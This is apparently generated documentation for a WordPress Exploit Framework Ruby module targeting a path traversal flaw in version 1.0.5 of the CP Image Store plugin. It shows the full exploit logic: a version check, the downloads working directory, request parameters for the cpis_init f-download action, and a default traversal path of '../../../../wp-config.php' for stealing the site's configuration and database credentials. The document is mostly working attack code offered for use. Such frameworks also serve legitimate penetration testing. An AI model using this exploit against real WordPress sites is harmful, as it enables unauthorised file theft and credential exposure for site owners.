class Wpxf::Auxiliary::CpImageStoreArbitraryFileDownload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 6 def initialize super update_info( name: 'CP Image Store Arbitrary File Download', desc: %( This module exploits a vulnerability in version 1.0.5 of the CP Image Store plugin which allows you to download any arbitrary file accessible by the user the web server is running as. ), author: [ 'Joaquin Ramirez Martinez', # Disclosure 'rastating' # WPXF module ], references: [ ['EDB', '37559'] ], date: 'Jun 10 2015' ) register_option( IntegerOption.new( name: 'purchase_id', desc: 'A valid purchase ID', required: true, default: 1 ) ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 36 def check check_plugin_version_from_readme('cp-image-store', '1.0.6', '1.0.5') end
default_remote_file_path()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 40 def default_remote_file_path '../../../../wp-config.php' end
download_request_params()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 52 def download_request_params { 'action' => 'cpis_init', 'cpis-action' => 'f-download', 'purchase_id' => purchase_id.to_s, 'cpis_user_email' => Utility::Text.rand_email, 'f' => remote_file } end
downloader_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 62 def downloader_url full_uri end
handle_unexpected_http_code(code)
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload#handle_unexpected_http_code
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 66 def handle_unexpected_http_code(code) if code == 302 emit_error 'The purchase ID appears to be invalid or reached the maximum number of downloads' return false end super end
purchase_id()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 48 def purchase_id normalized_option_value('purchase_id') end
run()
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload#run
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 75 def run res = nil scoped_option_change('follow_http_redirection', false) do res = super end res end
working_directory()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 44 def working_directory 'wp-content/plugins/cp-image-store/downloads' end